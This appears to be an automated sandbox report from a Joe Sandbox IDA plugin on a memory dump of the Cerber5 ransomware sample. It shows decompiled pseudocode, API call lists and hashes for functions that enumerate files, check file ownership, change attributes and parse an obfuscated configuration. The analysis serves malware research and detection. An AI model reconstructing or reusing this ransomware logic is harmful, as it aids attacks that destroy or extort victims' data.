Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CountCriticalSectionTick$AttributesCreateDeleteDirectoryFileInitializePathRootSkip
String ID: 0jt$lf@
API String ID: 892241556-2925110192
Opcode ID: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
Instruction ID: 166ea61db472a150428fbf2cef9c788feb35943bfc0e1425f8dccfb6179776be
Opcode Fuzzy Hash: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
Instruction Fuzzy Hash: 0121F9B290021167DB10BBB59D4E98F3BA8DF48318B54043BF905F71C2DE7CD94986AC

Uniqueness

Uniqueness Score: -1.00%

Function 00404D43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D43(WCHAR* __edi) {
				short _v524;
				short _v1044;
				void* __esi;
				int _t14;
				WCHAR* _t21;
				WCHAR* _t25;
				int _t26;
				WCHAR* _t27;
				void* _t28;

				_t25 = __edi;
				_t26 = 0;
				if(GetTempPathW(0x104,  &_v1044) != 0) {
					_t14 = GetTempFileNameW( &_v1044, E0040591C("W+x", 3, 0x9544c64e), 0,  &_v524);
					_t32 = _t14;
					if(_t14 != 0) {
						_t27 =  &_v524;
						E00404E5E(_t27, _t32);
						if(__edi != 0) {
							_t21 = _t28 + lstrlenW(_t27) * 2 - 0x208;
							while( *_t21 != 0x2e) {
								_t21 = _t21 - 2;
								__eflags = _t21;
							}
							if( *_t25 != 0x2e) {
								_t21 =  &(_t21[1]);
							}
							lstrcpyW(_t21, _t25);
						}
						_t26 = E00405933(0,  &_v524);
					}
				}
				return _t26;
			}

APIs

GetTempPathW.KERNEL32(00000104,?,?), ref: 00404D5B
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00404D89

Part of subcall function 00404E5E: SetFileAttributesW.KERNEL32(?,00000080,00000000,00404D9E), ref: 00404E67

lstrlenW.KERNEL32(?), ref: 00404DA5
lstrcpyW.KERNEL32(?,00000000), ref: 00404DC8

Strings

{f@, xrefs: 00404D43
W+x, xrefs: 00404D6C

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FileTemp$AttributesNamePathlstrcpylstrlen
String ID: W+x${f@
API String ID: 1221998058-3981993173
Opcode ID: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
Instruction ID: 3d1850192e65b297c1812ba81e242392aa226734748325530c2f33dcaa0427c0
Opcode Fuzzy Hash: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
Instruction Fuzzy Hash: F70196F290022997CB70AB65DD09ED777ACEF80700F04017AB605F31D1EA78DE848AD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C5 Relevance: 7.6, APIs: 5, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040A6C5(void* __ecx, void* __eflags, char* _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v23;
				char _v24;
				char _v28;
				void* __esi;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr _t54;
				intOrPtr* _t55;
				intOrPtr _t57;
				signed int _t62;
				signed int _t64;
				intOrPtr _t67;
				void* _t70;
				char* _t72;
				void* _t75;
				signed int _t80;
				void* _t83;
				void* _t89;
				void* _t90;

				E00405F6B(__ecx, __eflags,  &_v28);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t72 = _a4;
				_t66 = _t70;
				_v24 =  *_t72;
				CharLowerBuffW( *(_t72 + 8), lstrlenW( *(_t72 + 8)));
				_t75 = E0040A367;
				_t62 = 0;
				E0040A419(_t66, 0,  *(_t72 + 8), E0040A367,  &_v24);
				_t83 = (_t80 & 0xfffffff8) - 0x1c + 0x10;
				if( *_t72 != 0) {
					_t55 =  *0x42fa74; // 0x0
					_v23 = 1;
					if(_t55 != 0 &&  *_t55 > 0) {
						do {
							_t66 =  &_v24;
							E0040A419( &_v24, 0,  *((intOrPtr*)( *((intOrPtr*)(_t55 + 8)) + _t62 * 4)), E0040A367,  &_v24);
							_t55 =  *0x42fa74; // 0x0
							_t83 = _t83 + 0x10;
							_t62 = _t62 + 1;
						} while (_t62 <  *_t55);
					}
					_t64 = 0;
					_t89 =  *0x42fad0 - _t64; // 0x0
					if(_t89 > 0) {
						do {
							_t57 =  *0x42facc; // 0x0
							E0040A419(_t66, 0,  *((intOrPtr*)(_t57 + _t64 * 4)), _t75,  &_v24);
							_t83 = _t83 + 0x10;
							_t64 = _t64 + 1;
							_t90 = _t64 -  *0x42fad0; // 0x0
						} while (_t90 < 0);
					}
				}
				if(_v16 == 0) {
					E0040A6AC(_v20);
				} else {
					InterlockedIncrement( *(_t72 + 4));
					 *0x40f1dc( *((intOrPtr*)(_t72 + 0xc)));
					_t67 = _v16;
					if( *_t72 == 0) {
						_t49 =  *((intOrPtr*)(_t72 + 0x18));
						__eflags =  *_t49;
						if( *_t49 == 0) {
							_t50 =  *((intOrPtr*)(_t72 + 0x14));
						} else {
							_t50 =  *_t49;
						}
						 *_t50 = _t67;
						_t67 = _v12;
						_t51 =  *((intOrPtr*)(_t72 + 0x18));
					} else {
						_t51 =  *((intOrPtr*)(_t72 + 0x10));
					}
					 *_t51 = _t67;
					_t52 =  *((intOrPtr*)(_t72 + 0x1c));
					if( *_t52 == 0) {
						 *_t52 = _v24;
					} else {
						_t54 =  *_t52;
						while( *((intOrPtr*)(_t54 + 0xc)) != 0) {
							_t54 =  *((intOrPtr*)(_t54 + 0xc));
						}
						 *((intOrPtr*)(_t54 + 0xc)) = _v24;
					}
					 *0x40f1e4( *((intOrPtr*)(_t72 + 0xc)));
				}
				E00405463( *(_t72 + 8));
				return E00405463(_t72);
			}

0x0040a6d6
0x0040a6e1
0x0040a6e2
0x0040a6e3
0x0040a6e4
0x0040a6e5
0x0040a6e7
0x0040a6e8
0x0040a6ed
0x0040a6f1
0x0040a6ff
0x0040a70a
0x0040a713
0x0040a716
0x0040a71b
0x0040a720
0x0040a722
0x0040a727
0x0040a72e
0x0040a734
0x0040a737
0x0040a742
0x0040a747
0x0040a74c
0x0040a74f
0x0040a750
0x0040a734
0x0040a754
0x0040a756
0x0040a75c
0x0040a75e
0x0040a763
0x0040a76e
0x0040a773
0x0040a776
0x0040a777
0x0040a777
0x0040a75e
0x0040a75c
0x0040a785
0x0040a7f1
0x0040a787
0x0040a78a
0x0040a793
0x0040a79c
0x0040a7a0
0x0040a7a7
0x0040a7aa
0x0040a7ac
0x0040a7b2
0x0040a7ae
0x0040a7ae
0x0040a7ae
0x0040a7b5
0x0040a7b7
0x0040a7bb
0x0040a7a2
0x0040a7a2
0x0040a7a2
0x0040a7be
0x0040a7c0
0x0040a7c5
0x0040a7e0
0x0040a7c7
0x0040a7c7
0x0040a7ce
0x0040a7cb
0x0040a7cb
0x0040a7d7
0x0040a7d7
0x0040a7e5
0x0040a7e5
0x0040a7f9
0x0040a80b

APIs

Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,0042F840,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8

lstrlenW.KERNEL32(?), ref: 0040A6F5
CharLowerBuffW.USER32(?,00000000), ref: 0040A6FF

Part of subcall function 0040A419: wsprintfW.USER32 ref: 0040A464
Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A479
Part of subcall function 0040A419: GetFileSecurityW.ADVAPI32(?,00000001,?,00000400,?), ref: 0040A4A4
Part of subcall function 0040A419: GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
Part of subcall function 0040A419: EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
Part of subcall function 0040A419: lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
Part of subcall function 0040A419: FindFirstFileW.KERNEL32(?,?), ref: 0040A586
Part of subcall function 0040A419: WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2

InterlockedIncrement.KERNEL32(?), ref: 0040A78A
RtlEnterCriticalSection.NTDLL(?), ref: 0040A793
RtlLeaveCriticalSection.NTDLL(?), ref: 0040A7E5

Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
Part of subcall function 0040A419: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
Part of subcall function 0040A419: lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
Part of subcall function 0040A419: lstrlenW.KERNEL32(?), ref: 0040A602
Part of subcall function 0040A419: CharLowerBuffW.USER32(?,00000000), ref: 0040A610
Part of subcall function 0040A419: Sleep.KERNEL32(00000001), ref: 0040A621
Part of subcall function 0040A419: FindNextFileW.KERNEL32(?,?), ref: 0040A690
Part of subcall function 0040A419: FindClose.KERNEL32(?), ref: 0040A6A1

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Attributes$Findlstrlen$BuffCharCriticalLowerSectionSecurity$AddressCloseDescriptorEnterEqualFirstHandleIncrementInterlockedLeaveModuleNextObjectOwnerProcSingleSleepWaitlstrcatwsprintf
String ID:
API String ID: 2118666660-0
Opcode ID: 055cac09f6342940aaae60a4afb2c85f3a2abd09d374562fdc8bfdebca7794d3
Instruction ID: 13abfef68b097a612165134c634928f79b1fba2c5b552c62fd9ab30abf4ee98b
Opcode Fuzzy Hash: 055cac09f6342940aaae60a4afb2c85f3a2abd09d374562fdc8bfdebca7794d3
Instruction Fuzzy Hash: 7F41BC35604301EFC311DF68C884C1ABBB4FB44310B14857AF449AB2A2D334ECA9CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406885 Relevance: 7.6, APIs: 5, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406885(void* _a4, short* _a8) {
				void* _v8;
				int _v12;
				short _v532;
				short _v1052;
				int* _t30;

				_t30 = 0;
				if(RegOpenKeyExW(_a4, _a8, 0, 0x20119,  &_v8) == 0) {
					_v12 = 0x208;
					if(RegQueryValueExW(_v8, E0040591C( &E0040D340, 0x10, 0xa58690a2), 0, 0,  &_v532,  &_v12) == 0) {
						PathUnquoteSpacesW( &_v532);
						if(ExpandEnvironmentStringsW( &_v532,  &_v1052, 0x104) - 1 <= 0x103) {
							_t30 = E00405933(0,  &_v1052);
						}
					}
					RegCloseKey(_v8);
				}
				return _t30;
			}

0x00406898
0x004068a9
0x004068c4
0x004068df
0x004068e8
0x0040690d
0x0040691e
0x0040691e
0x0040690d
0x00406923
0x00406923
0x0040692d

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,00000000), ref: 004068A1
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?), ref: 004068D7
PathUnquoteSpacesW.SHLWAPI(?), ref: 004068E8
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406901

Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E

RegCloseKey.ADVAPI32(?), ref: 00406923

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExpandOpenPathQuerySpacesStringsUnquoteValuelstrlenmemcpy
String ID:
API String ID: 2229232589-0
Opcode ID: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
Instruction ID: 1c6706bfa8e7cfeb8a905d666c224299092f6be4206dfad9a6d2e40fcb3e7b74
Opcode Fuzzy Hash: d5f94109a22552542f79dd981f8c3c2a9d2cfe73a7d1d7489ccac6e0fbc3d8e3
Instruction Fuzzy Hash: E91130B2A0011CBBDB20ABA1DC49DDF7B7CEB04350F004475BA15E2590E6749A988FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E77 Relevance: 7.5, APIs: 5, Instructions: 46stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000028,000000FF,00000001,?,00000000), ref: 00405E91
SHGetFolderPathW.SHELL32(00000000,0040A04B,000000FF,00000001,?), ref: 00405EAA
lstrlenW.KERNEL32(?,00000000), ref: 00405EBC
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00405ED3
lstrcpyW.KERNEL32(00409B15,?), ref: 00405EE8

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FolderPath$lstrcpylstrlen
String ID:
API String ID: 1609553816-0
Opcode ID: 65910238698a16baef1403d8856055784a34b947144a8e198e14723933732cae
Instruction ID: de2901f31616993a4ae986fc8dc4909f55669c9a08417f91c19eeb543ab8afdd
Opcode Fuzzy Hash: 65910238698a16baef1403d8856055784a34b947144a8e198e14723933732cae
Instruction Fuzzy Hash: 670144765001187BEB209B55DC48FEB37ACEB45714F404671FA26F21D0EA70DA958B58

Uniqueness

Uniqueness Score: -1.00%

Function 004099D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004099D8(void* __ecx, void* __edi, WCHAR* _a4) {
				short _v524;
				long _t12;
				signed int _t13;
				intOrPtr _t21;
				void* _t22;
				long _t24;
				signed int _t25;
				long _t27;

				_t22 = __ecx;
				_t12 = ExpandEnvironmentStringsW(_a4,  &_v524, 0x104);
				if(_v524 != 0x25) {
					_t13 =  *0x42fac8; // 0x0
					_push(__edi);
					_t27 =  *0x42fa64; // 0x0
					_t12 = E004053CA(4 + _t13 * 4, _t22, _t27);
					 *0x42fa64 = _t12;
					if(_t12 != 0) {
						CharLowerBuffW( &_v524, lstrlenW( &_v524));
						_t21 = E00405933(0,  &_v524);
						_t25 =  *0x42fac8; // 0x0
						 *0x42fac8 =  *0x42fac8 + 1;
						_t24 =  *0x42fa64; // 0x0
						 *((intOrPtr*)(_t24 + _t25 * 4)) = _t21;
						return _t21;
					}
				}
				return _t12;
			}

APIs

ExpandEnvironmentStringsW.KERNEL32(0040A027,?,00000104), ref: 004099F0

Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457

lstrlenW.KERNEL32(00000025), ref: 00409A29
CharLowerBuffW.USER32(00000025,00000000), ref: 00409A37

Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E

Strings

%, xrefs: 004099F6

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLastlstrlen$BuffCharEnvironmentExpandLowerStringsmemcpy
String ID: %
API String ID: 2407717054-2567322570
Opcode ID: 41f1174d3a3b3665505f67eee8759ce1699167c381fc9e5be949fd63b7fc8eb4
Instruction ID: b68b054fab4078b33c7175d7f5feeef92c6c6c317c309be68269d8385537ad21
Opcode Fuzzy Hash: 41f1174d3a3b3665505f67eee8759ce1699167c381fc9e5be949fd63b7fc8eb4
Instruction Fuzzy Hash: 9E0162716002089BCB20DF64ED48D9B37BCEB44304F800176E559E35B5EB749A8ACF58

Uniqueness

Uniqueness Score: -1.00%

Function 00409C8E Relevance: 6.3, APIs: 4, Instructions: 327
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409C8E(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v0;
				short _v56;
				short _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t57;
				void* _t60;
				void* _t66;
				intOrPtr _t75;
				intOrPtr _t77;
				void* _t78;
				void* _t80;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t86;
				signed int _t90;
				long _t93;
				intOrPtr _t97;
				signed int _t102;
				intOrPtr _t103;
				signed int* _t105;
				signed int* _t109;
				intOrPtr _t111;
				void* _t114;
				void* _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				void* _t123;
				intOrPtr _t125;
				signed int _t132;
				signed int _t134;
				intOrPtr _t137;
				void* _t143;
				void* _t146;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t151;
				signed int* _t154;
				signed int* _t155;
				signed int* _t157;
				signed int* _t160;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				void* _t172;
				signed int _t174;
				void* _t177;
				void* _t178;
				void* _t179;
				signed int _t181;
				void* _t186;
				signed int* _t189;
				signed int* _t190;
				signed int* _t191;
				signed int* _t192;
				signed int* _t195;
				signed int* _t196;
				void* _t199;
				signed int _t206;
				void* _t211;
				void* _t213;
				signed int _t224;

				_t199 = __eflags;
				_t172 = __edx;
				 *0x40f1d8(0x42fad4);
				E0040692E(__ecx, E00409B30, 0);
				_t53 = E00405905( &E0040D17C, 7, 0x80c426c8);
				_t189 =  &(( &_v80)[5]);
				_t177 = E004031AF(_v0, _t199, _t53);
				_t200 = _t177;
				if(_t177 == 0) {
					L10:
					E00409215(_t172, _t208, _v0);
					_t57 = E00405905( &E0040D668, 9, 0x9c36dbf2);
					_t190 =  &(_t189[3]);
					_t186 = E004031AF(_v0, _t208, _t57);
					_t209 = _t186;
					if(_t186 == 0) {
						L30:
						_t60 = E00405905(0x40d834, 9, 0xd1c1cf3d);
						_t191 =  &(_t190[3]);
						_t178 = E004031AF(_v0, _t219, _t60);
						_t220 = _t178;
						if(_t178 == 0) {
							L35:
							 *0x40f93c(0x16, 0, 0x42fa80, 0x40fc68);
							_t224 =  *0x42fa7c; // 0x0
							return 0 | _t224 != 0x00000000;
						}
						_t66 = E00405905( &E0040D814, 7, 0x79d16581);
						_t192 =  &(_t191[3]);
						_t179 = E004031AF(_t178, _t220, _t66);
						_pop(_t143);
						_t221 = _t179;
						if(_t179 == 0) {
							goto L35;
						}
						E004099D8(_t143, _t175, E0040591C(0x40d840, 0xf, 0x514e394d));
						_t192[3] = 0x3735a35c;
						E004099D8(_t143, _t175, E0040591C());
						E00409AFD(_t221, 0x1a);
						E00409AFD(_t221, 0x1c);
						_t146 = 0x40d850;
						_t75 = E00409518(_t146, _t179, 3);
						_t148 = 0xe;
						 *0x42fa74 = _t75;
						if(_t75 != 0) {
							L34:
							E00409C5C(_t223);
							goto L35;
						}
						_push(0xc);
						_t77 = E004053B4(_t148);
						 *0x42fa74 = _t77;
						_t223 = _t77;
						if(_t77 == 0) {
							goto L35;
						}
						goto L34;
					}
					_t78 = E00405905(0x40d7b8, 5, 0xbfa95e66);
					_t195 =  &(_t190[3]);
					_t80 = E004031AF(_t186, _t209, _t78);
					_t135 = _t80;
					_pop(_t149);
					if(_t80 == 0) {
						L17:
						_t81 = E00405905( &E0040D814, 7, 0x79d16581);
						_t196 =  &(_t195[3]);
						_t83 = E004031AF(_t186, _t213, _t81);
						_pop(_t150);
						if(_t83 == 0) {
							L25:
							_t84 = E00405905(0x40d824, 0xa, 0xd9c16e9a);
							_t190 =  &(_t196[3]);
							_t86 = E004031AF(_t186, _t216, _t84);
							_pop(_t151);
							if(_t86 != 0) {
								_t154 = E00409518(_t151, _t86, 1);
								 *0x42fa60 = _t154;
								if(_t154 != 0) {
									_t175 = _t154[2];
									_t90 = E004053CA(4 +  *_t154 * 4, _t154, _t154[2]);
									_t155 =  *0x42fa60; // 0x0
									_t155[2] = _t90;
									_t219 = _t90;
									if(_t90 == 0) {
										 *_t155 =  *_t155 & 0x00000000;
										__eflags =  *_t155;
									} else {
										_push(0x42fe98);
										_t93 = wsprintfW( &_v64, E0040591C(0x40d830, 3, 0x26e76e6e));
										_t190 =  &(_t190[6]);
										CharLowerBuffW( &_v56, _t93);
										_t97 = E00408E00(_t155,  &_v56);
										_t157 =  *0x42fa60; // 0x0
										 *((intOrPtr*)(_t157[2] +  *_t157 * 4)) = _t97;
										 *_t157 =  *_t157 + 1;
									}
								}
							}
							goto L30;
						}
						_t160 = E00409518(_t150, _t83, 2);
						 *0x42faec = _t160;
						if(_t160 == 0) {
							goto L25;
						}
						_t175 = _t160[2];
						_t102 = E004053CA( *_t160 +  *0x42fad0 << 2, _t160, _t160[2]);
						_t161 =  *0x42faec; // 0x0
						_t181 = 0;
						_t161[2] = _t102;
						_t216 = _t102;
						if(_t102 != 0) {
							__eflags =  *0x42fad0 - _t181; // 0x0
							if(__eflags <= 0) {
								goto L25;
							} else {
								goto L22;
							}
							do {
								L22:
								_t103 =  *0x42facc; // 0x0
								_push( *((intOrPtr*)(_t103 + _t181 * 4)));
								_push(E0040591C( &E0040D81C, 4, 0x65dbde8b));
								_t105 =  *0x42faec; // 0x0
								_push(_t105[2] +  *_t105 * 4);
								E00405B0C(_t135,  *_t105, _t175, _t181, __eflags);
								_t109 =  *0x42faec; // 0x0
								_t163 =  *_t109;
								_t174 = _t109[2];
								_t196 =  &(_t196[6]);
								__eflags =  *(_t174 + _t163 * 4);
								if( *(_t174 + _t163 * 4) != 0) {
									_t164 = _t163 + 1;
									__eflags = _t164;
									 *_t109 = _t164;
								}
								_t181 = _t181 + 1;
								__eflags = _t181 -  *0x42fad0; // 0x0
							} while (__eflags < 0);
							goto L25;
						}
						 *_t161 = 0;
						goto L25;
					}
					_t175 = 0;
					_t211 =  *0x42fac4 - _t175; // 0x0
					if(_t211 <= 0) {
						L16:
						 *0x42fa5c = E00409518(_t149, _t135, 0);
						goto L17;
					} else {
						goto L13;
					}
					do {
						L13:
						_t111 =  *0x42fa70; // 0x0
						_t114 = E0040562B(0,  *((intOrPtr*)( *((intOrPtr*)(_t111 + _t175 * 4)))));
						_t182 = _t114;
						_pop(_t149);
						if(_t114 != 0) {
							E00402FF6(_t149, _t182);
							_pop(_t149);
							E00403144(_t149);
							E00405463(_t182);
						}
						_t175 = _t175 + 1;
						_t213 = _t175 -  *0x42fac4; // 0x0
					} while (_t213 < 0);
					goto L16;
				}
				_t118 = E00405905(0x40d7b8, 5, 0xbfa95e66);
				_t189 =  &(_t189[3]);
				_t120 = E004031AF(_t177, _t200, _t118);
				_pop(_t167);
				_v76 = _t120;
				_t201 = _t120;
				if(_t120 == 0) {
					L9:
					E00409857(_t167, _t208);
					goto L10;
				}
				_t122 = E00403156(_t120, _t201);
				_v80 = _v80 & 0x00000000;
				_v68 = _t122;
				_t202 = _t122;
				if(_t122 == 0) {
					goto L9;
				} else {
					goto L3;
				}
				do {
					L3:
					_t123 = E0040317B(_v76, _t202, _v80);
					_t185 = _t123;
					_pop(_t167);
					_t203 = _t123;
					if(_t123 == 0) {
						goto L8;
					}
					_t125 = E00403156(_t185, _t203);
					_v84 = _v84 & 0x00000000;
					_v72 = _t125;
					_t204 = _t125;
					if(_t125 == 0) {
						goto L8;
					} else {
						goto L5;
					}
					do {
						L5:
						_t187 = E00402FED(_t167);
						E0040317B(_t185, _t204, _v84);
						_pop(_t168);
						E0040314D(_t168);
						_t137 = E00409518(_t168, _t126, 1);
						_pop(_t170);
						if(_t137 != 0) {
							_t132 =  *0x42fa78; // 0x0
							_t175 =  *0x42fa7c; // 0x0
							_t134 = E004053CA(4 + _t132 * 4, _t170, _t175);
							_t171 =  *0x42fa78; // 0x0
							 *0x42fa78 =  *0x42fa78 + 1;
							_t206 =  *0x42fa78;
							 *0x42fa7c = _t134;
							 *((intOrPtr*)(_t134 + _t171 * 4)) = _t137;
						}
						E00403085(_t206, _t187);
						_v84 = _v84 + 1;
						_pop(_t167);
					} while (_v84 < _v72);
					L8:
					_v80 = _v80 + 1;
					_t208 = _v80 - _v68;
				} while (_v80 < _v68);
				goto L9;
			}

0x00409c8e
0x00409c8e
0x00409c9a
0x00409ca7
0x00409cb8
0x00409cbd
0x00409cca
0x00409ccd
0x00409ccf
0x00409dbb
0x00409dbf
0x00409dd1
0x00409dd6
0x00409de3
0x00409de6
0x00409de8
0x00409fc1
0x00409fcd
0x00409fd2
0x00409fdf
0x00409fe2
0x00409fe4
0x0040a07d
0x0040a08b
0x0040a094
0x0040a0a3
0x0040a0a3
0x00409ff6
0x00409ffb
0x0040a006
0x0040a008
0x0040a009
0x0040a00b
0x00000000
0x00000000
0x0040a022
0x0040a027
0x0040a03e
0x0040a046
0x0040a04e
0x0040a053
0x0040a057
0x0040a05d
0x0040a05e
0x0040a065
0x0040a078
0x0040a078
0x00000000
0x0040a078
0x0040a067
0x0040a06a
0x0040a06f
0x0040a074
0x0040a076
0x00000000
0x00000000
0x00000000
0x0040a076
0x00409dfa
0x00409dff
0x00409e05
0x00409e0a
0x00409e0c
0x00409e0f
0x00409e5c
0x00409e68
0x00409e6d
0x00409e73
0x00409e78
0x00409e7b
0x00409f14
0x00409f20
0x00409f25
0x00409f2b
0x00409f30
0x00409f33
0x00409f43
0x00409f45
0x00409f4d
0x00409f51
0x00409f5b
0x00409f60
0x00409f66
0x00409f69
0x00409f6b
0x00409fbe
0x00409fbe
0x00409f6d
0x00409f6d
0x00409f8c
0x00409f92
0x00409f9b
0x00409fa6
0x00409fac
0x00409fb7
0x00409fba
0x00409fba
0x00409f6b
0x00409f4d
0x00000000
0x00409f33
0x00409e8b
0x00409e8d
0x00409e95
0x00000000
0x00000000
0x00409e9f
0x00409ea5
0x00409eaa
0x00409eb0
0x00409eb2
0x00409eb5
0x00409eb7
0x00409ebd
0x00409ec3
0x00000000
0x00000000
0x00000000
0x00000000
0x00409ec5
0x00409ec5
0x00409ec5
0x00409eca
0x00409ee1
0x00409ee2
0x00409eef
0x00409ef0
0x00409ef5
0x00409efa
0x00409efc
0x00409eff
0x00409f02
0x00409f06
0x00409f08
0x00409f08
0x00409f09
0x00409f09
0x00409f0b
0x00409f0c
0x00409f0c
0x00000000
0x00409ec5
0x00409eb9
0x00000000
0x00409eb9
0x00409e11
0x00409e13
0x00409e19
0x00409e4d
0x00409e57
0x00000000
0x00000000
0x00000000
0x00000000
0x00409e1b
0x00409e1b
0x00409e1b
0x00409e27
0x00409e2c
0x00409e2e
0x00409e31
0x00409e34
0x00409e39
0x00409e3a
0x00409e3f
0x00409e3f
0x00409e44
0x00409e45
0x00409e45
0x00000000
0x00409e1b
0x00409ce1
0x00409ce6
0x00409cec
0x00409cf1
0x00409cf2
0x00409cf6
0x00409cf8
0x00409db6
0x00409db6
0x00000000
0x00409db6
0x00409d00
0x00409d05
0x00409d0a
0x00409d0e
0x00409d10
0x00000000
0x00000000
0x00000000
0x00000000
0x00409d16
0x00409d16
0x00409d1e
0x00409d23
0x00409d25
0x00409d26
0x00409d28
0x00000000
0x00000000
0x00409d2a
0x00409d2f
0x00409d34
0x00409d38
0x00409d3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00409d3c
0x00409d3c
0x00409d45
0x00409d47
0x00409d4c
0x00409d4f
0x00409d5c
0x00409d5f
0x00409d62
0x00409d64
